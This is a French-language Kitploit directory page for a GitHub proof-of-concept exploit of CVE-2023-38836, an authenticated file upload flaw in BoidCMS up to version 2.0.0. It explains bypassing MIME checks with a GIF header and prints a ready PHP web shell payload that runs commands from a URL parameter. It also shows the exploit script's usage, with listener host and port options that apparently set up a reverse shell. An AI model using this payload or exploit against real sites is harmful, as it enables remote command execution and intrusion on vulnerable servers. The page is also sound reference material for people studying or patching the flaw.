Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-38836 — Exploit PoC pour une vulnérabilité de téléchargement de fichier dans BoidCMS version <=2.0.0 | Kitploit
Outils/GitHubGitHub/1337kid/cve-2023-38836
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHub1337kid/cve-2023-38836

CVE-2023-38836

Exploit PoC pour une vulnérabilité de téléchargement de fichier dans BoidCMS version <=2.0.0

Voir le dépôt
51il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-38836 Exploit

Vulnérabilité de téléchargement de fichier dans BoidCMS v2.0.0 permet à un attaquant authentifié de télécharger un fichier de type dangereux (CWE-434).
Pour exploiter, un attaquant pourrait ajouter un en-tête GIF pour contourner les vérifications de type MIME.

root@kitploit:~
GIF89a;
<?php system($_GET["cmd"]); ?>

Utilisation

root@kitploit:~
usage: CVE-2023-38836.py [-h] [-u URL] [-U USER] [-P PASSWD] [-l LHOST] [-p LPORT]

Exploit pour CVE-2023-38836

options:
  -h, --help            affiche ce message d'aide et quitte
  -u URL, --url URL     URL du site web
  -U USER, --user USER  nom d'utilisateur admin
  -P PASSWD, --passwd PASSWD
                        mot de passe admin
  -l LHOST, --lhost LHOST
                        hôte d'écoute
  -p LPORT, --lport LPORT
                        port d'écoute

Télécharger l’outil